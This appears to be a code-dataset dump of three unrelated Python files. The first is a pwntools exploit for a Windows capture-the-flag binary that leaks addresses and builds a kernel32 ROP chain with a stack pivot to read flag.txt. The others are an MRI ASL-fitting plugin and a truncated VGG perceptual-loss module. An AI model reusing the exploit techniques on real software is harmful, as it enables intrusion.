text stringlengths 957 885k |
|---|
#!/usr/bin/env python
# Author: b0yd
# Ex: AppJailLauncher.exe /outbound /key:flag.txt /port:4444 ConsoleApplication2.exe
from pwn import *
import sys
import binascii
#####
##Uncomment the following code to use BugId as the test harness while trying to catch crashes
#
#sBaseFolderPath = "C:\Users\user\Documents\GitHub\BugId"
#for sPath in [sBaseFolderPath] + [os.path.join(sBaseFolderPath, x) for x in ["modules"]]:
# if sPath not in sys.path:
# sys.path.insert(0, sPath);
#import BugId
#def bugIdFunc(pid_arg):
# BugId.fuMain(['--pids='+str(pid)])
def eip(input):
    """
    Trigger the overwritten function pointer via menu option 0.

    Sends option '0', 0xe bytes of filler, the caller-supplied string
    (NUL-terminated), then pads the payload to exactly 0x400 bytes with
    0xff so the fixed-size read is fully satisfied.  Python 2 only.
    """
    payload = '0\n' + 'C' * 0xe + input + '\x00'
    # Pad to the full 0x400-byte buffer the target reads
    payload = payload.ljust(0x400, '\xff')
    r.send(payload)
def make(dep, arr, time):
    # Menu option 1: create a plane flying from airport `dep` to `arr`.
    r.sendline('1')
    r.recvuntil(': ')
    r.sendline(str(dep))
    r.recvuntil(': ')
    r.sendline(str(arr))
    data = r.recv()
    # The target only prompts for a time when the reply mentions "Arrival";
    # the trailing recvuntil syncs back to the menu prompt in that branch.
    # NOTE(review): original indentation was lost -- confirm whether the
    # final recvuntil belongs inside this conditional.
    if "Arrival" in data:
        r.sendline(str(time))
        r.recvuntil('?\n')
def sale(pl, name, cash):
    """
    Menu option 2: sell a ticket on plane `pl` to passenger `name` for
    `cash`.  The exploit abuses `name` to write controlled bytes and
    `cash` to plant the pivot target.
    """
    r.sendline('2')
    # Answer the plane-number and passenger-name prompts in order
    for answer in (str(pl), name):
        r.recvuntil(': ')
        r.sendline(answer)
    r.recvuntil(': ')
    r.sendline(str(cash))
    # Consume the re-printed menu so the next call starts in sync
    r.recvuntil('?\n')
def land(pl):
    """
    Menu option 3: land a plane.  Sends a 0x400-byte de Bruijn (cyclic)
    pattern, which was used to locate the crash offset during development.

    NOTE(review): the `pl` argument is accepted but never used.
    """
    r.sendline('3')
    r.recvuntil('? ')
    r.send(cyclic(0x400))
    r.recvuntil('?\n')
def airport_info_leak():
    """
    Menu option 4: return the raw airport-info text up to the next menu
    prompt.  The text leaks obfuscated pointers parsed by exploit().
    """
    r.sendline('4')
    return r.recvuntil('?\n')
def plane_info_leak(pl):
    """
    Menu option 5: return the info text for plane `pl` (everything after
    the 'From: ' marker up to the next menu prompt).
    """
    r.sendline('5')
    r.recvuntil('Which Plane: ')
    r.sendline(str(pl))
    r.recvuntil('From: ')
    return r.recvuntil('?\n')
def exploit(r):
    """
    Build and fire a ROP-based exploit against ConsoleApplication2.exe.

    Phases: (1) parse pointer leaks from menu 4; (2) groom the ticket
    array with a stack-pivot target; (3) build a kernel32 ROP chain that
    opens 'flag.txt' (_lopen), reads it (_lread) and writes it out via
    the binary's own WriteFile wrapper; (4) trigger the overwritten
    function pointer with eip().

    NOTE(review): Python 2 only (str payloads, dict.iteritems()).
    `r` is a pwntools tube; `bin_path` is a module-level global.
    """
    r.recvuntil('?\n')
    #Get memory leak from menu 4
    data = airport_info_leak().split()
    # Leaks are lightly obfuscated: strip embedded instruction bytes and
    # XOR the low 24 bits to recover the raw pointers.
    money = ( int(data[8]) - 0xC340C483489448) ^ 0xFFFFFF
    bin_addr = int(data[11]) ^ 0xFFFFFF #Have to xor
    # Static offsets measured against preferred image base 0x7FF70C700000
    leak_offset = (0x7FF70C714AF0 - 0x7FF70C700000)
    read_buf_off = (0x7FF70C714688 - 0x7FF70C700000)
    import_tbl_off = (0x7FF70C712000 - 0x7FF70C700000)  # NOTE(review): unused below
    base_addr = bin_addr - leak_offset
    log.info("App Base Address: " + hex(base_addr))
    #Make the first plane
    make(5, 4, 5555555555)
    # Layout of the global state structure being corrupted:
    #struct_null_ptr_bug_ptr_data struc ; (sizeof=0x202C, align=0x4, mappedto_36)
    #00000000 customer_count dd ?
    #00000004 gap4 dd ?
    #00000008 ticket_arr db 4096 dup(?) ; ticket sale array
    #00001008 num_of_planes dq ?
    #00001010 plane_array db 4096 dup(?)
    #00002010 money_earned? dq ?
    #00002018 overwritable_func_ptr dq ? ; called when 0 menu is called
    #00002020 gap2020 db 8 dup(?)
    #00002028 func_ptr_arg dd ?
    #0000202C struct_null_ptr_bug_ptr_data ends
    #Get gadgets from the application
    pe = PE(bin_path)
    rop = ROP(pe, load_all=True)
    #Get stack pivot from main binary
    #This gadget was strategically place because nothing usable exists in kernel32 or mscvrt
    gadget_iter = rop.search_iter( regs=["rsp", "rax"], ops=["xchg"] )
    gadget_list = list(gadget_iter)
    gadget = gadget_list[1]
    pivot_off = gadget.address & 0xffffffff
    log.info("Pivot offset: " + hex(pivot_off) )
    # Overflow customer_count past the 0x400-entry ticket array so later
    # sale() payloads land where the pivoted stack will point.
    cust = 0x402
    for j in range(cust, cust * 2):
        buf = ''
        buf += "B" * 0x200
        sale(0, buf, j)
    #Get gadgets from the application
    pe = PE("C:\\Divided\\kernel32.dll")
    rop = ROP(pe, load_all=True)
    #Resolve VirtualAlloc address
    virtual_alloc_off = rop.resolve("VirtualAlloc")
    # The "money" leak is the runtime address of VirtualAlloc, giving the
    # kernel32 load address despite ASLR.
    k32_base = money - virtual_alloc_off
    log.info("Kernel32 Base: " + hex(k32_base))
    #Get gadget to align stack for file open
    #https://social.msdn.microsoft.com/Forums/en-US/306ba651-59d4-4dba-934b-3be247b12d4e/movaps-gp-in-createfilea-after-upgrading-to-win10?forum=windowscompatibility
    align_gadj = None
    for piv,addr in rop.pivots.iteritems():
        if piv == 10:
            align_gadj = addr & 0xffffffff #Need to add 4
            break
    if align_gadj == None:
        log.info("Couldn't find gadget to align the stack")
        sys.exit(1)
    align_rop = align_gadj + k32_base
    # ROP chain starts here: first gadget re-aligns RSP to 16 bytes so
    # SSE (movaps) instructions inside CreateFileA/_lopen don't fault.
    buf = p64(align_rop)
    #Get pop rax gadget
    rax_gadg = None
    gadget_iter = rop.search_iter( regs=["rax"], ops=["pop"] )
    gadget_list = list(gadget_iter)
    for gadget in gadget_list:
        if len(gadget.insns) == 2 and gadget.move == 8:
            rax_gadg = gadget
            break
    if rax_gadg == None:
        log.info("Couldn't find gadget for pop rax")
        sys.exit(1)
    rax_off = rax_gadg.address & 0xffffffff
    rax_rop = rax_off + k32_base
    buf += p64(rax_rop)
    buf += "C" * 6 #Garbage for stack alignment
    # A plain `ret` (pop rax gadget + 1 byte skips the pop) used as a nop
    ret_addr = rax_rop + 1
    buf += p64(ret_addr)
    buf += p64(ret_addr) #Align 8 extra bytes
    #Get arg1 pop
    rcx_gadg = None
    gadget_iter = rop.search_iter( regs=["rcx"], ops=["pop", "jmp"] )
    gadget_list = list(gadget_iter)
    for gadget in gadget_list:
        if len(gadget.insns) == 2 and gadget.move == 4:
            rcx_gadg = gadget
            break
    if rcx_gadg == None:
        log.info("Couldn't find gadget for pop rcx")
        sys.exit(1)
    rcx_off = (rcx_gadg.address)& 0xffffffff
    rcx_rop = rcx_off + k32_base
    # arg1 (rcx) = pointer to the file name written into the data section
    buf += p64(rcx_rop)
    buf += p64(read_buf_off + base_addr + 0x10 ) #Ptr to file name
    #Get pop rdx gadget
    rdx_gadg = None
    gadget_iter = rop.search_iter( regs=["rdx"], ops=["pop"] )
    gadget_list = list(gadget_iter)
    for gadget in gadget_list:
        if len(gadget.insns) == 2:
            rdx_gadg = gadget
            break
    if rdx_gadg == None:
        log.info("Couldn't find gadget for pop rdx")
        sys.exit(1)
    rdx_off = rdx_gadg.address & 0xffffffff
    rdx_rop = rdx_off + k32_base
    # arg2 (rdx) = OF_READ mode flag (0) for _lopen
    buf += p64(rdx_rop)
    buf += p64(0) #Read flag for file open
    #Add file open call
    lopen_off = rop.resolve('_lopen')
    buf += p64(lopen_off + k32_base)
    #Skip over garbage
    buf += p64(rdx_rop)
    buf += "C" * 8 #Garbage that gets overwritten
    # Move the file handle returned in eax into ecx (arg1 of _lread)
    rax_gadg = None
    gadget_iter = rop.search_iter( dst_regs=['ecx'], src_regs=['eax', 'r9d'], ops=['mov'] )
    gadget_list = list(gadget_iter)
    for gadget in gadget_list:
        if gadget.move == 0x2c:
            rax_gadg = gadget
            break
    if rax_gadg == None:
        log.info("Couldn't find gadget for pop rax")
        sys.exit(1)
    #Move file handle to rcx for next call
    rax_off = rax_gadg.address & 0xffffffff
    rax_rop = rax_off + k32_base
    buf += p64(rax_rop)
    buf += "D" * 0x28 #Garbage
    # arg2 (rdx) = destination buffer for the flag contents
    buf += p64(rdx_rop)
    buf += p64(read_buf_off + base_addr + 0x30) #Ptr to data section buf
    #Get pop rbx gadget
    rbx_gadg = None
    gadget_iter = rop.search_iter( dst_regs=["rbx"], ops=["pop"] )
    gadget_list = list(gadget_iter)
    for gadget in gadget_list:
        if len(gadget.insns) == 2 and gadget.move == 8:
            rbx_gadg = gadget
            break
    if rbx_gadg == None:
        log.info("Couldn't find gadget for pop rbx")
        sys.exit(1)
    rbx_off = rbx_gadg.address & 0xffffffff
    rbx_rop = rbx_off + k32_base
    buf += p64(rbx_rop)
    buf += p64(ret_addr )
    #Get gadget to clear r8
    r8b_gadg = None
    gadget_iter = rop.search_iter( dst_regs=["r8d", "rbx"], ops=["xor"] )
    gadget_list = list(gadget_iter)
    for gadget in gadget_list:
        if len(gadget.insns) == 0x2:
            r8b_gadg = gadget
    if r8b_gadg == None:
        log.info("Couldn't find gadget for pop r8b")
        sys.exit(1)
    r8_off = r8b_gadg.address & 0xffffffff
    r8_rop = r8_off + k32_base
    buf += p64(r8_rop)
    buf += "D" * 0x38 #Garbage
    #Get pop rax gadget
    rax_gadg = None
    gadget_iter = rop.search_iter( dst_regs=["rax"], ops=["pop"] )
    gadget_list = list(gadget_iter)
    for gadget in gadget_list:
        if len(gadget.insns) == 2 and gadget.move == 8:
            rax_gadg = gadget
            break
    if rax_gadg == None:
        log.info("Couldn't find gadget for pop rax")
        sys.exit(1)
    rax_off = rax_gadg.address & 0xffffffff
    rax_rop = rax_off + k32_base
    buf += p64(rax_rop)
    buf += p64(read_buf_off + base_addr + 0x20 )
    #Get add r8b, rax gadget
    # Sets r8 (arg3 of _lread: byte count) via add into its low byte
    r8b_gadg = None
    gadget_iter = rop.search_iter( dst_regs=["r8b"], ops=["add"] )
    gadget_list = list(gadget_iter)
    for gadget in gadget_list:
        r8b_gadg = gadget
        break
    if r8b_gadg == None:
        log.info("Couldn't find gadget for pop r8b")
        sys.exit(1)
    r8_off = r8b_gadg.address & 0xffffffff
    r8_rop = r8_off + k32_base
    buf += p64(r8_rop)
    buf += "D" * 0x28 #Garbage
    #Add read call
    lread_off = rop.resolve("_lread")
    buf += p64(lread_off + k32_base)
    #Skip over garbage
    buf += p64(rdx_rop)
    buf += 'C' * 8 #Garbage that gets overwritten
    #Get pop rsi gadget
    rsi_gadg = None
    gadget_iter = rop.search_iter( dst_regs=["rsi"], ops=["pop"] )
    gadget_list = list(gadget_iter)
    for gadget in gadget_list:
        if len(gadget.insns) == 2 and gadget.move == 8:
            rsi_gadg = gadget
            break
    if rsi_gadg == None:
        log.info("Couldn't find gadget for pop rax")
        sys.exit(1)
    rsi_off = rsi_gadg.address & 0xffffffff
    rsi_rop = rsi_off + k32_base
    # rsi = buffer holding the flag, consumed by the binary's own
    # WriteFile wrapper below
    buf += p64(rsi_rop)
    buf += p64(read_buf_off + base_addr + 0x30 ) #Flag buffer
    #Write length
    buf += p64(rbx_rop)
    buf += p64( 100 )
    #Write out the flag
    write_off = ( 0x0007FF703C2CE70 - 0x0007FF703C20000 ) #Offset to writefile in binary
    buf += p64( write_off + base_addr )
    #Garbage
    buf += "C"* ( 0x200 - len(buf))
    # Plant the chain via a ticket sale; `cash` becomes the pivot address
    sale(0, buf, pivot_off + base_addr)
    #Trigger call to function ptr overwrite
    buf = 'flag.txt'
    eip(buf)
    #Drop into interactive
    r.interactive()
if __name__ == "__main__":
    # Local copy of the challenge binary (normally served via
    # AppJailLauncher -- see the usage example at the top of the file)
    bin_path = 'C:\\Divided\\ConsoleApplication2.exe'
    #r = remote('127.0.0.1', 4444)
    r = process([bin_path])
    # Optional debugging hooks kept for reference:
    #pid = util.proc.pidof(p)[0]
    #t = Thread(target = bugIdFunc, args = ([pid]))
    #t.daemon = True
    #t.start() #start collecting lines from the stream
    #pause()
    #Windbg args
    #args = []
    #args = ["lm"]
    #args.append("bp ConsoleApplication2+0xf0b1") # print plane info
    #args.append("bp ConsoleApplication2+0xFB86") # func ptr callable
    #args.append("g")
    #Start the process with windbg attached
    #windbg.attach( r, args )
    #r = windbg.debug([bin_path], args )
    exploit(r)
|
<filename>oxasl_multite/api.py
"""
OXASL plugin for processing multiphase ASL data
Copyright (c) 2019 Univerisity of Oxford
"""
import math
import numpy as np
from fsl.wrappers import LOAD
from fsl.data.image import Image
from oxasl import basil
from oxasl.options import OptionCategory, IgnorableOptionGroup
from oxasl.reporting import Report
from oxasl.wrappers import fabber, mvntool
from ._version import __version__
def _run_fabber(wsp, options, desc):
    """
    Execute Fabber with the given options and copy its outputs onto the
    workspace.

    :param wsp: Workspace that receives every Fabber output as an attribute
    :param options: Dictionary of Fabber options
    :param desc: One-line description written to the workspace log
    :return: Dictionary of Fabber outputs (keyed by output name)
    """
    log = wsp.log
    log.write(" - %s " % desc)
    result = fabber(options, output=LOAD, progress_log=log, log=wsp.fsllog)
    log.write(" - DONE\n")
    # Mirror every Fabber output onto the workspace
    for name in result:
        setattr(wsp, name, result[name])
    # Persist the run log when the workspace is backed by a save directory
    logfile = result["logfile"]
    if logfile is not None and wsp.savedir is not None:
        wsp.set_item("logfile", logfile, save_fn=str)
    return result
def _base_fabber_options(wsp, asldata):
options = {
"method" : "vb",
"noise" : "white",
"model" : "asl_multite",
"data" : asldata,
"mask" : wsp.rois.mask,
"ti" : list(asldata.tis),
"tau" : list(asldata.taus),
"repeats" : asldata.rpts[0], # We have already checked repeats are fixed
"save-mean" : True,
"max-iterations": 30,
}
if wsp.bat is None:
wsp.bat = 1.3 if wsp.casl else 0.7
if wsp.batsd is None:
wsp.batsd = 1.0 if len(asldata.tis) > 1 else 0.1
for opt in ("bat", "batsd", "t1", "t1b"):
val = wsp.ifnone(opt, None)
if val is not None:
options[opt] = val
return options
def _multite_fabber_options(wsp, asldata):
    """
    Build the Fabber options for the multi-TE model fit.

    Extends the common options with TE values, exchange-time inference
    and the (user-overridable) T2 value in seconds.

    :param wsp: Workspace providing user options
    :param asldata: ASL data image for the fit
    :return: Dictionary of Fabber options
    """
    options = _base_fabber_options(wsp, asldata)
    multite_opts = {
        "model" : "asl_multite",
        "te" : list(wsp.asldata.tes),
        "infertexch" : True,
        "save-std" : True,
        "save-model-fit" : True,
        "save-residuals" : wsp.ifnone("output_residuals", False),
        "max-iterations": 30,
        # T2 option is in seconds, user value in ms (default 50ms)
        "t2" : float(wsp.ifnone("t2", 50)) / 1000,
    }
    options.update(multite_opts)
    if wsp.spatial:
        # Spatial regularization on the perfusion parameter only
        options["PSP_byname1"] = "ftiss"
        options["PSP_byname1_type"] = "M"
        options["method"] = "spatialvb"
    # Additional user-specified multiphase fitting options override the above
    options.update(wsp.ifnone("multite_options", {}))
    return options
def _aslrest_fabber_options(wsp, asldata):
    """
    Build the Fabber options for a standard resting-state (ASLREST) fit,
    used to generate initial CBF/ATT estimates for the multi-TE fit.

    :param wsp: Workspace providing user options
    :param asldata: ASL data image for the fit
    :return: Dictionary of Fabber options
    """
    options = _base_fabber_options(wsp, asldata)
    options["model"] = "aslrest"
    # NOTE(review): cASL is hard-coded here, unlike the base options
    # which consult wsp.casl -- confirm this is intentional
    options["casl"] = True
    options["inctiss"] = True
    options["incbat"] = True
    options["infertiss"] = True
    options["inferbat"] = True
    options["save-std"] = True
    return options
def init_t2(wsp):
    """
    Initialize the T2 value by fitting the T2 decay part of the signal

    We do not use Fabber for this (although it would be possible). Instead
    we do a simple voxel-by-voxel least squares fit to a T2 decay model using
    a subset of voxels with the strongest signals. We take the median of the T2
    value as our estimate since the mean can be affected by extreme values resulting
    from fitting problems.

    :param wsp: Workspace with ``asldata``, ``rois.mask`` and an initial
                ``t2`` guess (ms). On exit ``wsp.t2`` holds the median
                fitted T2 in ms.
    """
    # Hoisted out of the per-voxel loop (was imported inside the loop)
    from scipy.optimize import curve_fit

    def t2model(tes, t2, *s0):
        """Mono-exponential decay: each signal s0[i] spans a contiguous run of TEs."""
        # BUG FIX: integer division required - np.repeat needs an integer
        # repeat count and true division yields a float on Python 3
        ntes = len(tes) // len(s0)
        s0 = np.repeat(np.array(s0), ntes)
        # tes in seconds, t2 in ms, hence the factor of 1000
        return s0 * np.exp(-1000*tes/t2)

    wsp.log.write(" - Initializing T2 value by fit to T2 decay model\n")
    # Estimate T2 and a T2 corrected signal
    wsp.data_multite = wsp.asldata.diff().reorder(out_order="etr")
    data_multite = wsp.data_multite.data
    # Identify unmasked voxels with strongest signals (range across volumes)
    diffdata = data_multite.max(axis=-1) - data_multite.min(axis=-1)
    thresh = np.percentile(diffdata, wsp.ifnone("multite_t2_init_percentile", 95))
    wsp.log.write(" - Including unmasked voxels with signal > %f\n" % thresh)
    roidata = np.logical_and(wsp.rois.mask.data > 0, diffdata > thresh)
    data_multite_roi = data_multite[roidata]
    nvoxels_roi = data_multite_roi.shape[0]
    nvols = wsp.asldata.nvols
    ntes = wsp.asldata.ntes
    nsigs = int(nvols / ntes)
    # TE sequence repeated once per signal, matching the "etr" data ordering
    tes = np.array(wsp.asldata.tes * nsigs)
    wsp.log.write(" - %i TEs, %i volumes, %i signals, %i voxels\n" % (ntes, nvols, nsigs, nvoxels_roi))
    # Go through each voxel and fit the T2 decay model for S0 and T2
    t2_roi = np.zeros((nvoxels_roi, ), dtype=np.float32)
    sig_roi = np.zeros((nvoxels_roi, nsigs), dtype=np.float32)
    for voxel_idx, data_multite_voxel in enumerate(data_multite_roi):
        try:
            # Initialize signal from maximum of the data at each time point
            sig_init = [max(data_multite_voxel[sig_idx*ntes:(sig_idx+1)*ntes]) for sig_idx in range(nsigs)]
            # NOTE: uses wsp.t2 (ms) as the initial T2 guess - assumed set by caller
            param_init = [wsp.t2, ] + sig_init
            popt, _ = curve_fit(t2model, tes, data_multite_voxel, p0=param_init)
            t2_roi[voxel_idx] = popt[0]
            sig_roi[voxel_idx, :] = popt[1:]
        except Exception:
            # Failed fits are simply skipped - they contribute a zero to the
            # median which the strong-signal preselection keeps rare
            wsp.log.write(" - WARNING: fit failed for voxel: %i\n" % voxel_idx)
    wsp.t2 = np.median(t2_roi)
    wsp.log.write(" - Median T2: %f ms\n" % wsp.t2)
def fit_init(wsp):
    """
    Do an initial fit on ftiss and delttiss using the aslrest model

    The first stage of this is to apply a T2 correction to the multi-TE data
    and take the mean across TEs, since the ASLREST model contains no T2
    correction.

    The resulting ASL data is put through the basic ASLREST model. We then run a single
    iteration of the multi-TE model to generate an MVN, and insert the ftiss and delttiss
    output from ASLREST into the MVN. This is then used to initialize the multi-TE run.

    :param wsp: Initialization sub-workspace; requires ``asldata``, ``t2`` (ms)
    """
    wsp.log.write(" - Preparing initialization of perfusion from resting state model\n")
    wsp.data_multite = wsp.asldata.diff().reorder(out_order="etr")
    data_multite = wsp.data_multite.data
    tes = wsp.asldata.tes
    nvols_mean = int(wsp.asldata.nvols/len(tes))
    # Do the T2 correction and take the mean across TEs
    data_mean = np.zeros(list(data_multite.shape[:3]) + [nvols_mean])
    for idx, te in enumerate(tes):
        # exp(+TE/T2) undoes the T2 decay exp(-TE/T2) at this echo time
        # (TE in seconds, wsp.t2 in ms - hence the factor of 1000)
        t2_corr_factor = math.exp(1000 * te / wsp.t2)
        wsp.log.write(" - Using T2 correction factor for TE=%f: %f\n" % (te, t2_corr_factor))
        # Volumes for TE index `idx` occur every ntes volumes in "etr" order
        data_mean += data_multite[..., idx::wsp.asldata.ntes] * t2_corr_factor
    wsp.asldata_mean = wsp.asldata.derived(image=data_mean/len(tes), name="asldata",
                                           iaf="diff", order="tr", tes=[0])
    # Run ASLREST on the mean data to generate initial estimates for CBF and ATT
    options = _aslrest_fabber_options(wsp, wsp.asldata_mean)
    result = _run_fabber(wsp.sub("aslrest"), options, "Running Fabber using standard ASL model for CBF/ATT initialization")
    # mvntool expects variances, so square the standard deviations
    wsp.aslrest.var_ftiss = Image(np.square(wsp.aslrest.std_ftiss.data), header=wsp.aslrest.std_ftiss.header)
    wsp.aslrest.var_delttiss = Image(np.square(wsp.aslrest.std_delttiss.data), header=wsp.aslrest.std_delttiss.header)
    # Run the multi-TE model for 1 iteration to get an MVN in the correct format
    options = _multite_fabber_options(wsp, wsp.asldata)
    options.update({"save-mvn" : True, "max-iterations" : 1})
    result = _run_fabber(wsp.sub("mvncreate"), options, "Running Fabber for 1 iteration on multi-TE model to generate initialization MVN")
    # Merge the CBF and ATT estimates from the ASLREST run into the output MVN to generate an initialization MVN
    # for the final multi-TE fit. Parameter indices: 1=ftiss, 2=delttiss
    wsp.log.write(" - Merging CBF and ATT estimates into the MVN to initialize multi-TE fit\n")
    wsp.init_mvn = mvntool(wsp.mvncreate.finalMVN, 1, output=LOAD, mask=wsp.rois.mask, write=True, valim=wsp.aslrest.mean_ftiss, varim=wsp.aslrest.var_ftiss, log=wsp.fsllog)["output"]
    wsp.init_mvn = mvntool(wsp.init_mvn, 2, output=LOAD, mask=wsp.rois.mask, write=True, valim=wsp.aslrest.mean_delttiss, varim=wsp.aslrest.var_delttiss, log=wsp.fsllog)["output"]
def fit_multite(wsp):
    """
    Run model fitting on multi-TE data

    :param wsp: Multi-TE sub-workspace (the caller passes ``wsp.multite``)
    :raises ValueError: if the data has variable repeats per TI
    """
    wsp.log.write("\nPerforming multi-TE model fitting:\n")
    if wsp.asldata.is_var_repeats():
        raise ValueError("Multi-TE ASL data with variable repeats not currently supported")
    # Make sure repeats are the slowest varying as this is what the model expects. Similarly
    # make sure varying TEs are always within each TI
    wsp.asldata = wsp.asldata.diff().reorder(out_order="etr")
    options = _multite_fabber_options(wsp, wsp.asldata)
    if wsp.multite_init_t2:
        # Optional: estimate T2 from the data rather than using the default
        wsp.sub("init_t2")
        init_t2(wsp.init_t2)
        wsp.t2 = wsp.init_t2.t2
    if wsp.multite_init:
        # Optional: initialize CBF/ATT from a resting-state (ASLREST) fit
        wsp.sub("init")
        fit_init(wsp.init)
        options["continue-from-mvn"] = wsp.init.init_mvn
    # NOTE(review): `wsp` here is already the multite sub-workspace (see
    # model_multite), so `wsp.multite` is probably unset - this looks like
    # it should be `wsp.sub("finalstep")`; confirm against oxasl Workspace
    # attribute semantics before changing.
    result = _run_fabber(wsp.multite.sub("finalstep"), options, "Running Fabber using multi-TE model")
    wsp.log.write("\nDONE multi-TE model fitting\n")
def model_multite(wsp):
    """
    Do modelling on multi-TE ASL data

    :param wsp: Workspace object

    Required workspace attributes
    -----------------------------
    - ``asldata`` - ASLImage containing multi-TE data

    Optional workspace attributes
    -----------------------------
    See ``MultiTEOptions`` for other options

    Workspace attributes updated
    ----------------------------
    - ``multite`` - Sub-workspace containing multi-TE decoding output
    - ``output`` - Sub workspace containing native/structural/standard space
      parameter maps
    """
    wsp.sub("multite")
    fit_multite(wsp.multite)
    # Write output
    wsp.sub("output")
    # Imported here to avoid a circular import with the oxasl package
    from oxasl import oxford_asl
    oxford_asl.output_native(wsp.output, wsp.multite)
    # Re-do registration using PWI map.
    oxford_asl.redo_reg(wsp, wsp.output.native.perfusion)
    # Write output in transformed spaces
    oxford_asl.output_trans(wsp.output)
    wsp.log.write("\nDONE processing\n")
class MultiTEOptions(OptionCategory):
    """
    OptionCategory which contains options for preprocessing multi-TE ASL data
    """

    def __init__(self, **kwargs):
        OptionCategory.__init__(self, "oxasl_multite", **kwargs)

    def groups(self, parser):
        """
        Return the option groups contributed by this plugin.

        :param parser: Command-line parser the groups belong to
        :return: List containing one IgnorableOptionGroup of multi-TE options
        """
        groups = []
        group = IgnorableOptionGroup(parser, "Multi-TE Options", ignore=self.ignore)
        group.add_option("--multite-init-t2", help="Initialize T2 value", action="store_true", default=False)
        # Help-text fixes: "restring" -> "resting"; "multiphase" -> "multi-TE"
        # (copy/paste left-over from the multiphase plugin)
        group.add_option("--multite-init", help="Initialize perfusion and transit time using fit on resting state ASL model", action="store_true", default=False)
        group.add_option("--multite-options", help="File containing additional options for multi-TE fitting step", type="optfile")
        groups.append(group)
        return groups
|
"""
Code borrowed from https://gist.github.com/alper111/8233cdb0414b4cb5853f2f730ab95a49#file-vgg_perceptual_loss-py-L5
"""
import torch
import torchvision
from models.vggface import VGGFaceFeats
def cos_loss(fi, ft):
    """Return 1 minus the mean cosine similarity between feature batches fi and ft."""
    similarity = torch.nn.functional.cosine_similarity(fi, ft)
    return 1 - similarity.mean()
class VGGPerceptualLoss(torch.nn.Module):
    """
    Perceptual (feature-space) loss based on ImageNet-pretrained VGG16.

    Inputs are expected in [-1, 1]; they are remapped to [0, 1] and
    normalized with the standard ImageNet mean/std before being passed
    through the first four VGG16 feature blocks. The loss is the sum of
    per-block L1 (or cosine) distances between input and target features.
    """

    def __init__(self, resize=False):
        """
        :param resize: If True, bilinearly resize inputs to 224x224 (VGG's
                       native resolution) before feature extraction.
        """
        super(VGGPerceptualLoss, self).__init__()
        # Instantiate the pretrained network once and slice it, instead of
        # building (and potentially downloading) four separate copies.
        features = torchvision.models.vgg16(pretrained=True).features
        blocks = [
            features[:4].eval(),     # relu1_2
            features[4:9].eval(),    # relu2_2
            features[9:16].eval(),   # relu3_3
            features[16:23].eval(),  # relu4_3
        ]
        for bl in blocks:
            # BUG FIX: the original iterated the block's child *modules*
            # (`for p in bl`) and set a meaningless `requires_grad` attribute
            # on them, leaving the underlying weights trainable. Freeze the
            # actual parameters.
            for p in bl.parameters():
                p.requires_grad = False
        self.blocks = torch.nn.ModuleList(blocks)
        self.transform = torch.nn.functional.interpolate
        # requires_grad=False so the normalization constants are never
        # updated by an optimizer (they were trainable Parameters before);
        # keeping them as Parameters preserves state_dict compatibility.
        self.mean = torch.nn.Parameter(torch.tensor([0.485, 0.456, 0.406]).view(1, 3, 1, 1), requires_grad=False)
        self.std = torch.nn.Parameter(torch.tensor([0.229, 0.224, 0.225]).view(1, 3, 1, 1), requires_grad=False)
        self.resize = resize

    def forward(self, input, target, max_layer=4, cos_dist: bool = False):
        """
        :param input: Batch in [-1, 1]; single-channel inputs are broadcast to RGB
        :param target: Batch in [-1, 1], same shape as input
        :param max_layer: Number of VGG blocks (1-4) to accumulate loss over
        :param cos_dist: Use cosine distance instead of L1 between features
        :return: Scalar loss tensor (target features are detached)
        """
        # Map inputs from [-1, 1] to [0, 1]
        target = (target + 1) * 0.5
        input = (input + 1) * 0.5
        if input.shape[1] != 3:
            input = input.repeat(1, 3, 1, 1)
            target = target.repeat(1, 3, 1, 1)
        input = (input - self.mean) / self.std
        target = (target - self.mean) / self.std
        if self.resize:
            input = self.transform(input, mode='bilinear', size=(224, 224), align_corners=False)
            target = self.transform(target, mode='bilinear', size=(224, 224), align_corners=False)
        x = input
        y = target
        loss = 0.0
        loss_func = cos_loss if cos_dist else torch.nn.functional.l1_loss
        for block in self.blocks[:max_layer]:
            x = block(x)
            y = block(y)
            loss += loss_func(x, y.detach())
        return loss
class VGGFacePerceptualLoss(torch.nn.Module):
    """
    Perceptual loss computed from VGG-Face features.

    Inputs are expected in [-1, 1]; they are remapped to [0, 1] and
    mean-centred using the VGG-Face channel means (rescaled from 0-255).
    """

    def __init__(self, weight_path: str = "checkpoint/vgg_face_dag.pt", resize: bool = False):
        """
        :param weight_path: Path to the pretrained VGG-Face state dict
        :param resize: If True, bilinearly resize inputs to 224x224
        """
        super().__init__()
        self.vgg = VGGFaceFeats()
        # NOTE(review): torch.load unpickles arbitrary objects - only load
        # trusted checkpoint files.
        self.vgg.load_state_dict(torch.load(weight_path))
        # VGG-Face means are in the 0-255 range; rescale to [0, 1] inputs
        mean = torch.tensor(self.vgg.meta["mean"]).view(1, 3, 1, 1) / 255.0
        self.register_buffer("mean", mean)
        self.transform = torch.nn.functional.interpolate
        self.resize = resize

    def forward(self, input, target, max_layer: int = 4, cos_dist: bool = False):
        """
        :param input: Batch in [-1, 1]; single-channel inputs broadcast to RGB
        :param target: Batch in [-1, 1], same shape as input
        :param max_layer: Number of feature levels to accumulate loss over
        :param cos_dist: Use cosine distance instead of L1 between features
        :return: Scalar loss tensor (target features are detached)
        """
        # Map inputs from [-1, 1] to [0, 1]
        target = (target + 1) * 0.5
        input = (input + 1) * 0.5
        # preprocessing
        if input.shape[1] != 3:
            input = input.repeat(1, 3, 1, 1)
            target = target.repeat(1, 3, 1, 1)
        input = input - self.mean
        target = target - self.mean
        if self.resize:
            input = self.transform(input, mode='bilinear', size=(224, 224), align_corners=False)
            target = self.transform(target, mode='bilinear', size=(224, 224), align_corners=False)
        input_feats = self.vgg(input)
        target_feats = self.vgg(target)
        loss_func = cos_loss if cos_dist else torch.nn.functional.l1_loss
        # calc perceptual loss
        loss = 0.0
        for fi, ft in zip(input_feats[:max_layer], target_feats[:max_layer]):
            loss = loss + loss_func(fi, ft.detach())
        return loss
class PerceptualLoss(torch.nn.Module):
    """
    Weighted combination of ImageNet-VGG and VGG-Face perceptual losses.

    Sub-losses are only instantiated when their weight exceeds ``eps``,
    avoiding unnecessary model construction/weight loading.
    """

    def __init__(
        self, lambda_vggface: float = 0.025 / 0.15, lambda_vgg: float = 1, eps: float = 1e-8, cos_dist: bool = False
    ):
        super().__init__()
        # Buffers so the weights follow the module across .to(device) calls
        self.register_buffer("lambda_vggface", torch.tensor(lambda_vggface))
        self.register_buffer("lambda_vgg", torch.tensor(lambda_vgg))
